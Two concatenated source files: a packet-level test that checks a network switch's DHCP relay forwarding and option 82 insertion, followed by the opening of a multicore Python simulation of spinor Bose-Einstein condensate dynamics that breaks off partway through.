        # These are the interfaces we are injected into that link to our leaf switches
self.server_port_indices = ast.literal_eval(self.test_params['leaf_port_indices'])
self.num_dhcp_servers = int(self.test_params['num_dhcp_servers'])
self.assertTrue(self.num_dhcp_servers > 0,
"Error: This test requires at least one DHCP server to be specified!")
# We will simulate a responding DHCP server on the first interface in the provided set
self.server_ip = self.test_params['server_ip']
self.server_iface_mac = self.dataplane.get_mac(0, self.server_port_indices[0])
self.relay_iface_ip = self.test_params['relay_iface_ip']
self.relay_iface_mac = self.test_params['relay_iface_mac']
self.client_iface_alias = self.test_params['client_iface_alias']
self.client_port_index = int(self.test_params['client_port_index'])
self.client_mac = self.dataplane.get_mac(0, self.client_port_index)
self.switch_loopback_ip = self.test_params['switch_loopback_ip']
self.uplink_mac = self.test_params['uplink_mac']
# 'dual' for dual tor testing
# 'single' for regular single tor testing
self.dual_tor = (self.test_params['testing_mode'] == 'dual')
self.testbed_mode = self.test_params['testbed_mode']
# option82 is a byte string created by the relay agent. It contains the circuit_id and remote_id fields.
# circuit_id is stored as suboption 1 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 1
# Byte 1: Length of suboption data in bytes
# Bytes 2+: Suboption data
# Our circuit_id string is of the form "hostname:portname"
circuit_id_string = self.hostname + ":" + self.client_iface_alias
self.option82 = struct.pack('BB', 1, len(circuit_id_string))
self.option82 += circuit_id_string.encode('utf-8')
# remote_id is stored as suboption 2 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 2
# Byte 1: Length of suboption data in bytes
# Bytes 2+: Suboption data
# Our remote_id string simply consists of the MAC address of the port that received the request
remote_id_string = self.relay_iface_mac
self.option82 += struct.pack('BB', 2, len(remote_id_string))
self.option82 += remote_id_string.encode('utf-8')
# In 'dual' testing mode, vlan ip is stored as suboption 5 of option 82.
# It consists of the following:
# Byte 0: Suboption number, always set to 5
# Byte 1: Length of suboption data in bytes, always set to 4 (ipv4 addr has 4 bytes)
# Bytes 2+: vlan ip addr
if self.dual_tor:
link_selection = bytes(list(map(int, self.relay_iface_ip.split('.'))))
self.option82 += struct.pack('BB', 5, 4)
self.option82 += link_selection
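        # Illustrative layout of the assembled option 82 payload, using the example values
        # from the docstring above (hostname "str-s6000-acs-12", port alias "fortyGigE0/4",
        # relay MAC "ec:f4:bb:fe:88:0a"):
        #   suboption 1: 0x01 0x1d b"str-s6000-acs-12:fortyGigE0/4"   (circuit_id, 29 bytes)
        #   suboption 2: 0x02 0x11 b"ec:f4:bb:fe:88:0a"               (remote_id, 17 bytes)
        # and, in dual-ToR mode only, suboption 5: 0x05 0x04 followed by the 4 raw bytes
        # of the VLAN (relay interface) IP.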
# We'll assign our client the IP address 1 greater than our relay interface (i.e., gateway) IP
self.client_ip = incrementIpAddress(self.relay_iface_ip, 1)
self.client_subnet = self.test_params['relay_iface_netmask']
self.dest_mac_address = self.test_params['dest_mac_address']
self.client_udp_src_port = self.test_params['client_udp_src_port']
def tearDown(self):
DataplaneBaseTest.tearDown(self)
"""
Packet generation functions/wrappers
"""
def create_dhcp_discover_packet(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
discover_packet = testutils.dhcp_discover_packet(eth_client=self.client_mac, set_broadcast_bit=True)
discover_packet[scapy.Ether].dst = dst_mac
discover_packet[scapy.IP].sport = src_port
if dst_mac != self.BROADCAST_MAC:
discover_packet[scapy.IP].dst = self.switch_loopback_ip
discover_packet[scapy.IP].src = self.client_ip
return discover_packet
def create_dhcp_discover_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPDISCOVER message in the following ways:
# 1.) Increments the hops count in the DHCP header
        # 2.) Updates the gateway IP address in the BOOTP header (if it is 0.0.0.0)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received the broadcast DHCPDISCOVER message on
# 4.) Replaces the destination IP with the IP address of the DHCP server
# each message is being forwarded to
# Here, the actual destination MAC should be the MAC of the leaf the relay
# forwards through and the destination IP should be the IP of the DHCP server
# the relay is forwarding to. We don't need to confirm these, so we'll
# just mask them off later
#
# TODO: In IP layer, DHCP relay also replaces source IP with IP of interface on
# which it received the broadcast DHCPDISCOVER from client. This appears to
# be loopback. We could pull from minigraph and check here.
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.uplink_mac, type=0x0800)
ip = scapy.IP(src=self.DEFAULT_ROUTE_IP, dst=self.BROADCAST_IP, len=328, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_SERVER_PORT, len=308)
bootp = scapy.BOOTP(op=1,
htype=1,
hlen=6,
hops=1,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.DEFAULT_ROUTE_IP,
siaddr=self.DEFAULT_ROUTE_IP,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'discover'),
(82, self.option82),
('end')])
# If our bootp layer is too small, pad it
pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
if pad_bytes > 0:
bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_offer_packet(self):
return testutils.dhcp_offer_packet(eth_server=self.server_iface_mac,
eth_dst=self.uplink_mac,
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_dst=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
ip_offered=self.client_ip,
port_dst=self.DHCP_SERVER_PORT,
ip_gateway=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
netmask_client=self.client_subnet,
dhcp_lease=self.LEASE_TIME,
padding_bytes=0,
set_broadcast_bit=True)
def create_dhcp_offer_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPOFFER message in the following ways:
# 1.) Replaces the source MAC with the MAC of the interface it received it on
        # 2.) Replaces the destination MAC with broadcast (ff:ff:ff:ff:ff:ff)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received it on
# 4.) Replaces the destination IP with broadcast (255.255.255.255)
# 5.) Replaces the destination port with the DHCP client port (68)
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.relay_iface_mac, type=0x0800)
ip = scapy.IP(src=self.relay_iface_ip, dst=self.BROADCAST_IP, len=290, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_CLIENT_PORT, len=262)
bootp = scapy.BOOTP(op=2,
htype=1,
hlen=6,
hops=0,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.client_ip,
siaddr=self.server_ip,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'offer'),
('server_id', self.server_ip),
('lease_time', self.LEASE_TIME),
('subnet_mask', self.client_subnet),
('end')])
# TODO: Need to add this to the packet creation functions in PTF code first!
# If our bootp layer is too small, pad it
#pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
#if pad_bytes > 0:
# bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_request_packet(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
request_packet = testutils.dhcp_request_packet(
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_requested=self.client_ip,
set_broadcast_bit=True
)
request_packet[scapy.Ether].dst = dst_mac
request_packet[scapy.IP].sport = src_port
if dst_mac != self.BROADCAST_MAC:
request_packet[scapy.IP].dst = self.switch_loopback_ip
request_packet[scapy.IP].src = self.client_ip
return request_packet
def create_dhcp_request_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Here, the actual destination MAC should be the MAC of the leaf the relay
# forwards through and the destination IP should be the IP of the DHCP server
# the relay is forwarding to. We don't need to confirm these, so we'll
# just mask them off later
#
# TODO: In IP layer, DHCP relay also replaces source IP with IP of interface on
# which it received the broadcast DHCPREQUEST from client. This appears to
# be loopback. We could pull from minigraph and check here.
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.uplink_mac, type=0x0800)
ip = scapy.IP(src=self.DEFAULT_ROUTE_IP, dst=self.BROADCAST_IP, len=336, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_SERVER_PORT, len=316)
bootp = scapy.BOOTP(op=1,
htype=1,
hlen=6,
hops=1,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.DEFAULT_ROUTE_IP,
siaddr=self.DEFAULT_ROUTE_IP,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'request'),
('requested_addr', self.client_ip),
('server_id', self.server_ip),
(82, self.option82),
('end')])
# If our bootp layer is too small, pad it
pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
if pad_bytes > 0:
bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
def create_dhcp_ack_packet(self):
return testutils.dhcp_ack_packet(eth_server=self.server_iface_mac,
eth_dst=self.uplink_mac,
eth_client=self.client_mac,
ip_server=self.server_ip,
ip_dst=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
ip_offered=self.client_ip,
port_dst=self.DHCP_SERVER_PORT,
ip_gateway=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
netmask_client=self.client_subnet,
dhcp_lease=self.LEASE_TIME,
padding_bytes=0,
set_broadcast_bit=True)
def create_dhcp_ack_relayed_packet(self):
my_chaddr = binascii.unhexlify(self.client_mac.replace(':', ''))
my_chaddr += b'\x00\x00\x00\x00\x00\x00'
# Relay modifies the DHCPACK message in the following ways:
# 1.) Replaces the source MAC with the MAC of the interface it received it on
        # 2.) Replaces the destination MAC with broadcast (ff:ff:ff:ff:ff:ff)
# 3.) Replaces the source IP with the IP of the interface which the relay
# received it on
# 4.) Replaces the destination IP with broadcast (255.255.255.255)
# 5.) Replaces the destination port with the DHCP client port (68)
ether = scapy.Ether(dst=self.BROADCAST_MAC, src=self.relay_iface_mac, type=0x0800)
ip = scapy.IP(src=self.relay_iface_ip, dst=self.BROADCAST_IP, len=290, ttl=64)
udp = scapy.UDP(sport=self.DHCP_SERVER_PORT, dport=self.DHCP_CLIENT_PORT, len=262)
bootp = scapy.BOOTP(op=2,
htype=1,
hlen=6,
hops=0,
xid=0,
secs=0,
flags=0x8000,
ciaddr=self.DEFAULT_ROUTE_IP,
yiaddr=self.client_ip,
siaddr=self.server_ip,
giaddr=self.relay_iface_ip if not self.dual_tor else self.switch_loopback_ip,
chaddr=my_chaddr)
bootp /= scapy.DHCP(options=[('message-type', 'ack'),
('server_id', self.server_ip),
('lease_time', self.LEASE_TIME),
('subnet_mask', self.client_subnet),
('end')])
# TODO: Need to add this to the packet creation functions in PTF code first!
# If our bootp layer is too small, pad it
#pad_bytes = self.DHCP_PKT_BOOTP_MIN_LEN - len(bootp)
#if pad_bytes > 0:
# bootp /= scapy.PADDING('\x00' * pad_bytes)
pkt = ether / ip / udp / bootp
return pkt
"""
Send/receive functions
"""
# Simulate client coming on VLAN and broadcasting a DHCPDISCOVER message
def client_send_discover(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCPDISCOVER packet
dhcp_discover = self.create_dhcp_discover_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_discover)
    # Verify whether the relayed packet carries the option 82 info: sniff for the relayed
    # packet on the leaves and, once a packet is received, check its destination and inspect
    # the DHCP options to verify the option 82 contents.
def pkt_callback(self, pkt):
if pkt.haslayer(scapy2.IP) and pkt.haslayer(scapy2.DHCP):
if pkt.getlayer(scapy2.IP).dst in [self.server_ip] and pkt.getlayer(scapy2.DHCP) is not None:
self.verified_option82 = False
pkt_options = ''
for option in pkt.getlayer(scapy2.DHCP).options:
if option[0] == 'relay_agent_information':
pkt_options = option[1]
break
if self.option82 in pkt_options:
self.verified_option82 = True
    def Sniffer(self, iface):
        scapy2.sniff(iface=iface, filter="udp and (port 67 or 68)", prn=self.pkt_callback, store=0, timeout=3)
# Verify that the DHCP relay actually received and relayed the DHCPDISCOVER message to all of
# its known DHCP servers. We also verify that the relay inserted Option 82 information in the
# packet.
def verify_relayed_discover(self):
        # Create a packet resembling a relayed DHCPDISCOVER packet
dhcp_discover_relayed = self.create_dhcp_discover_relayed_packet()
# Mask off fields we don't care about matching
masked_discover = Mask(dhcp_discover_relayed)
masked_discover.set_do_not_care_scapy(scapy.Ether, "dst")
masked_discover.set_do_not_care_scapy(scapy.IP, "version")
masked_discover.set_do_not_care_scapy(scapy.IP, "ihl")
masked_discover.set_do_not_care_scapy(scapy.IP, "tos")
masked_discover.set_do_not_care_scapy(scapy.IP, "len")
masked_discover.set_do_not_care_scapy(scapy.IP, "id")
masked_discover.set_do_not_care_scapy(scapy.IP, "flags")
masked_discover.set_do_not_care_scapy(scapy.IP, "frag")
masked_discover.set_do_not_care_scapy(scapy.IP, "ttl")
masked_discover.set_do_not_care_scapy(scapy.IP, "proto")
masked_discover.set_do_not_care_scapy(scapy.IP, "chksum")
masked_discover.set_do_not_care_scapy(scapy.IP, "src")
masked_discover.set_do_not_care_scapy(scapy.IP, "dst")
masked_discover.set_do_not_care_scapy(scapy.IP, "options")
masked_discover.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_discover.set_do_not_care_scapy(scapy.UDP, "len")
masked_discover.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_discover.set_do_not_care_scapy(scapy.BOOTP, "file")
# Count the number of these packets received on the ports connected to our leaves
num_expected_packets = self.num_dhcp_servers
discover_count = testutils.count_matched_packets_all_ports(self, masked_discover, self.server_port_indices)
self.assertTrue(discover_count == num_expected_packets,
"Failed: Discover count of %d != %d" % (discover_count, num_expected_packets))
# Simulate a DHCP server sending a DHCPOFFER message to client.
# We do this by injecting a DHCPOFFER message on the link connected to one
# of our leaf switches.
def server_send_offer(self):
dhcp_offer = self.create_dhcp_offer_packet()
testutils.send_packet(self, self.server_port_indices[0], dhcp_offer)
# Verify that the DHCPOFFER would be received by our simulated client
def verify_offer_received(self):
dhcp_offer = self.create_dhcp_offer_relayed_packet()
masked_offer = Mask(dhcp_offer)
masked_offer.set_do_not_care_scapy(scapy.IP, "version")
masked_offer.set_do_not_care_scapy(scapy.IP, "ihl")
masked_offer.set_do_not_care_scapy(scapy.IP, "tos")
masked_offer.set_do_not_care_scapy(scapy.IP, "len")
masked_offer.set_do_not_care_scapy(scapy.IP, "id")
masked_offer.set_do_not_care_scapy(scapy.IP, "flags")
masked_offer.set_do_not_care_scapy(scapy.IP, "frag")
masked_offer.set_do_not_care_scapy(scapy.IP, "ttl")
masked_offer.set_do_not_care_scapy(scapy.IP, "proto")
masked_offer.set_do_not_care_scapy(scapy.IP, "chksum")
masked_offer.set_do_not_care_scapy(scapy.IP, "options")
masked_offer.set_do_not_care_scapy(scapy.UDP, "len")
masked_offer.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_offer.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_offer.set_do_not_care_scapy(scapy.BOOTP, "file")
# NOTE: verify_packet() will fail for us via an assert, so no need to check a return value here
testutils.verify_packet(self, masked_offer, self.client_port_index)
# Simulate our client sending a DHCPREQUEST message
def client_send_request(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Verify that the DHCP relay actually received and relayed the DHCPREQUEST message to all of
# its known DHCP servers. We also verify that the relay inserted Option 82 information in the
# packet.
def verify_relayed_request(self):
        # Create a packet resembling a relayed DHCPREQUEST packet
dhcp_request_relayed = self.create_dhcp_request_relayed_packet()
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request_relayed)
masked_request.set_do_not_care_scapy(scapy.Ether, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
# Count the number of these packets received on the ports connected to our leaves
num_expected_packets = self.num_dhcp_servers
request_count = testutils.count_matched_packets_all_ports(self, masked_request, self.server_port_indices)
self.assertTrue(request_count == num_expected_packets,
"Failed: Request count of %d != %d" % (request_count, num_expected_packets))
    # Simulate a DHCP server sending a DHCPACK message to client from one of our leaves
def server_send_ack(self):
dhcp_ack = self.create_dhcp_ack_packet()
testutils.send_packet(self, self.server_port_indices[0], dhcp_ack)
# Verify that the DHCPACK would be received by our simulated client
def verify_ack_received(self):
dhcp_ack = self.create_dhcp_ack_relayed_packet()
masked_ack = Mask(dhcp_ack)
masked_ack.set_do_not_care_scapy(scapy.IP, "version")
masked_ack.set_do_not_care_scapy(scapy.IP, "ihl")
masked_ack.set_do_not_care_scapy(scapy.IP, "tos")
masked_ack.set_do_not_care_scapy(scapy.IP, "len")
masked_ack.set_do_not_care_scapy(scapy.IP, "id")
masked_ack.set_do_not_care_scapy(scapy.IP, "flags")
masked_ack.set_do_not_care_scapy(scapy.IP, "frag")
masked_ack.set_do_not_care_scapy(scapy.IP, "ttl")
masked_ack.set_do_not_care_scapy(scapy.IP, "proto")
masked_ack.set_do_not_care_scapy(scapy.IP, "chksum")
masked_ack.set_do_not_care_scapy(scapy.IP, "options")
masked_ack.set_do_not_care_scapy(scapy.UDP, "len")
masked_ack.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_ack.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_ack.set_do_not_care_scapy(scapy.BOOTP, "file")
# NOTE: verify_packet() will fail for us via an assert, so no need to check a return value here
testutils.verify_packet(self, masked_ack, self.client_port_index)
def verify_dhcp_relay_pkt_on_other_client_port_with_no_padding(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCP Relay packet
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request)
masked_request.set_do_not_care_scapy(scapy.Ether, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.DHCP, "options")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "yiaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "ciaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "siaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "giaddr")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "chaddr")
        try:
            testutils.verify_packets_any(self, masked_request, self.other_client_port)
        except Exception:
            self.assertTrue(False, "DHCP Relay packet not matched or padded extra on client side")
def verify_dhcp_relay_pkt_on_server_port_with_no_padding(self, dst_mac=BROADCAST_MAC, src_port=DHCP_CLIENT_PORT):
# Form and send DHCP Relay packet
dhcp_request = self.create_dhcp_request_packet(dst_mac, src_port)
testutils.send_packet(self, self.client_port_index, dhcp_request)
# Mask off fields we don't care about matching
        # Create a packet resembling a relayed DHCPREQUEST packet
dhcp_request_relayed = self.create_dhcp_request_relayed_packet()
# Mask off fields we don't care about matching
masked_request = Mask(dhcp_request_relayed)
masked_request.set_do_not_care_scapy(scapy.Ether, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "version")
masked_request.set_do_not_care_scapy(scapy.IP, "ihl")
masked_request.set_do_not_care_scapy(scapy.IP, "tos")
masked_request.set_do_not_care_scapy(scapy.IP, "len")
masked_request.set_do_not_care_scapy(scapy.IP, "id")
masked_request.set_do_not_care_scapy(scapy.IP, "flags")
masked_request.set_do_not_care_scapy(scapy.IP, "frag")
masked_request.set_do_not_care_scapy(scapy.IP, "ttl")
masked_request.set_do_not_care_scapy(scapy.IP, "proto")
masked_request.set_do_not_care_scapy(scapy.IP, "chksum")
masked_request.set_do_not_care_scapy(scapy.IP, "src")
masked_request.set_do_not_care_scapy(scapy.IP, "dst")
masked_request.set_do_not_care_scapy(scapy.IP, "options")
masked_request.set_do_not_care_scapy(scapy.UDP, "chksum")
masked_request.set_do_not_care_scapy(scapy.UDP, "len")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "sname")
masked_request.set_do_not_care_scapy(scapy.BOOTP, "file")
        try:
            testutils.verify_packets_any(self, masked_request, self.server_port_indices)
        except Exception:
            self.assertTrue(False, "DHCP Relay packet not matched or padded extra on server side")
def runTest(self):
# Start sniffer process for each server port to capture DHCP packet
# and then verify option 82
for interface_index in self.server_port_indices:
t1 = Thread(target=self.Sniffer, args=("eth"+str(interface_index),))
t1.start()
self.client_send_discover(self.dest_mac_address, self.client_udp_src_port)
self.verify_relayed_discover()
self.server_send_offer()
self.verify_offer_received()
self.client_send_request(self.dest_mac_address, self.client_udp_src_port)
self.verify_relayed_request()
self.server_send_ack()
self.verify_ack_received()
self.assertTrue(self.verified_option82,"Failed: Verifying option 82")
## Below verification will be done only when client port is set in ptf_runner
if 'other_client_port' in self.test_params:
self.verify_dhcp_relay_pkt_on_other_client_port_with_no_padding(self.dest_mac_address, self.client_udp_src_port)
self.verify_dhcp_relay_pkt_on_server_port_with_no_padding(self.dest_mac_address, self.client_udp_src_port)
|
spinorf_multicore.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 5 14:24:21 2015
This is the python version of spinorf with multicore processing
@author: zag
"""
import time as timemod
import numpy as np
import math
try:
import numba
from .chebyshev_functions_numba import setup_scaled_H, moments, find_norm
except ImportError:
from .chebyshev_functions import setup_scaled_H, moments, find_norm
# chebyshev_propagator is used in calc_m_loop; assumed to be provided by chebyshev_functions
from .chebyshev_functions import alpha_help, find_nmax, chebyshev_propagator
from multiprocessing import Process, Queue
# first we have initialization variables
def calc_m_loop(queue, m, params):
"""calculate for specific magnetization"""
    # unpack the params dictionary; can't just do **params due to the intricacy of the call
n_tot = params['n_tot']
atom_range = params['atom_range']
emw = params['emw']
eqz = params['eqz']
c = params['c']
n_step = params['n_step']
delta_t = params['delta_t']
ndiv = params['ndiv']
alpha_minus = params['alpha_minus']
alpha_plus = params['alpha_plus']
alpha_zero = params['alpha_zero']
norm_factor = params['norm_factor']
norm_for_m = 0
    # now declare local arrays; they will be aggregated at the end
sum_of_means = np.zeros(sum(n_step) + 1) # one for each time step
sum_of_meansq = np.zeros(sum(n_step) + 1)
norm = np.zeros(sum(n_step) + 1)
time = np.zeros(sum(n_step) + 1)
    # allocate arrays
for atom_n in range(n_tot - atom_range, n_tot + atom_range + 1):
if atom_n >= abs(m):
n_max = find_nmax(atom_n, m)
e_min, e_max, d, e, first_n0 = setup_scaled_H(eqz + emw[0], c[0], atom_n, m, n_max)
state = np.zeros(int(n_max), dtype=complex)
sum_coef = 0
# now loop over j
for j in range(int(n_max)):
n_zero_min = np.mod(atom_n - abs(m), 2)
n_zero = n_zero_min + 2 * j
n_minus = (atom_n - n_zero - m) / 2
n_plus = m + n_minus
if n_minus >= 0 and n_plus >= 0 and n_zero >= 0:
ln_minus = alpha_help(alpha_minus, n_minus)
ln_plus = alpha_help(alpha_plus, n_plus)
ln_zero = alpha_help(alpha_zero, n_zero)
sum_ln = ln_minus + ln_plus + ln_zero
ln_coef = sum_ln - norm_factor
state[j] = np.exp(ln_coef)
else:
                    state[j] = complex(0, 0)
# now do timestep loop
t = 0
t_step = 0
mean, mean_sq = moments(state, first_n0)
sum_of_meansq[t_step] += mean_sq
sum_of_means[t_step] += mean
sum_coef = find_norm(state)
norm_for_m += sum_coef
norm[t_step] += sum_coef
time[t_step] = t
t_step = t_step + 1
for interval in range(ndiv):
q = eqz + emw[interval]
e_min, e_max, d, e, first_n0 = setup_scaled_H(
q, c[interval], atom_n, m, n_max)
dt = delta_t[interval] / (n_step[interval]) # time step
scaled_dt = 2 * np.pi * (e_max - e_min) * dt / 2
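                # Presumably setup_scaled_H rescales the Hamiltonian spectrum from
                # [e_min, e_max] (in Hz) to [-1, 1], so the Chebyshev propagator is fed an
                # effective step of 2*pi * (e_max - e_min)/2 * dt: half the spectral range,
                # converted from Hz to angular frequency, times the time step.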
t_local_scaled = 0
for i in range(n_step[interval]):
t = t + dt
t_local_scaled += scaled_dt
state = chebyshev_propagator(scaled_dt, state, n_max, e, d)
mean, mean_sq = moments(state, first_n0)
sum_of_meansq[t_step] += mean_sq
sum_of_means[t_step] += mean
sum_coef = find_norm(state)
norm_for_m += sum_coef
norm[t_step] += sum_coef
time[t_step] = t
t_step += 1
queue.put([time, sum_of_means, sum_of_meansq, norm])
def write_out(filename, b_field, n_0, c_init, n_tot, mag, mag_range, atom_range,
spinor_phase, init_state_solver, propogate, delta_t, emw, eqz,
c, n_step, sum_of_means, sum_of_meansq, norm, time):
"""Write out the simulation data file"""
outstring1 = '{:<15}{:<15}{:<15}{:<15}\n'
outstring = '{:<15.6e}{:<15.6e}{:<15.6e}{:<15.6e}\n'
infostring = '{:<20} = {:<15}\n'
with open(filename, 'w') as fp:
# write out parameters
fp.write(infostring.format('Species', '23Na'))
fp.write(infostring.format('B Field (muT)', b_field))
fp.write(infostring.format('N_0', n_0))
fp.write(infostring.format('C_init', c_init))
fp.write(infostring.format('Total Atom Number', n_tot))
fp.write(infostring.format('Magnetization', mag))
fp.write(infostring.format('Mag Range', mag_range))
fp.write(infostring.format('Atom Range', atom_range))
fp.write(infostring.format('Spinor Phase', spinor_phase))
fp.write(infostring.format('Initial State Solver', init_state_solver))
fp.write(infostring.format('Propogator', propogate) + '\n')
# write out the arrays
fp.write('{:<15}{:<15}{:<15}{:<15}{:<15}\n'.format('Delta t (s)',
'Emw(Hz)',
'q(Hz)',
'C(Hz)',
'num steps'))
for i in range(len(delta_t)):
fp.write('{:<15}{:<15}{:<15}{:<15}{:<15}\n'.format(delta_t[i],
emw[i],
eqz + emw[i],
c[i],
n_step[i]))
fp.write('\n')
fp.write(outstring1.format('t(s)', 'mean', 'stddev', 'norm'))
for time_step in range(len(sum_of_means)):
t = time[time_step]
mean = sum_of_means[time_step] / norm[time_step]
meansq = sum_of_meansq[time_step] / norm[time_step]
fp.write(outstring.format(t, mean, np.sqrt(
meansq - mean * mean), norm[time_step]))
def solve_system(b_field, n_tot, mag, mag_range, atom_range, spinor_phase, n_0,
ndiv, delta_t, c, emw, n_step):
eqz = np.real(0.0277 * b_field**2)
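    # 0.0277 Hz/(uT)^2 corresponds to the ~277 Hz/G^2 quadratic Zeeman shift of 23Na,
    # with b_field given in microtesla (cf. the 'B Field (muT)' label in write_out).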
# now we want to allocate numpy array
num_par = 2 * mag_range + 1
sum_of_means = np.zeros((num_par, sum(n_step) + 1)
) # one for each time step
sum_of_meansq = np.zeros((num_par, sum(n_step) + 1))
norm = np.zeros((num_par, sum(n_step) + 1))
time = np.zeros((num_par, sum(n_step) + 1))
#density = np.zeros(sum(n_step) * int(n_tot)+atom_range+1)
    if n_0 < 1e-20:
        alpha_zero = complex(0, 0)
    else:
        alpha_zero = np.sqrt(n_0) * np.exp(complex(0, spinor_phase / 2))
    if (n_tot - n_0 + mag) < 1e-20:
        alpha_plus = complex(0, 0)
    else:
        alpha_plus = complex(np.sqrt(mag + (n_tot - n_0 - mag) / 2), 0)
    if (n_tot - n_0 - mag) < 1e-20:
        alpha_minus = complex(0, 0)
    else:
        alpha_minus = complex(np.sqrt((n_tot - n_0 - mag) / 2), 0)
# calculate normalization factor
norm_factor = (abs(alpha_minus)**2 + abs(alpha_zero)
** 2 + abs(alpha_plus)**2) / 2
params = {
'n_tot': n_tot,
'atom_range': atom_range,
'n_0': n_0,
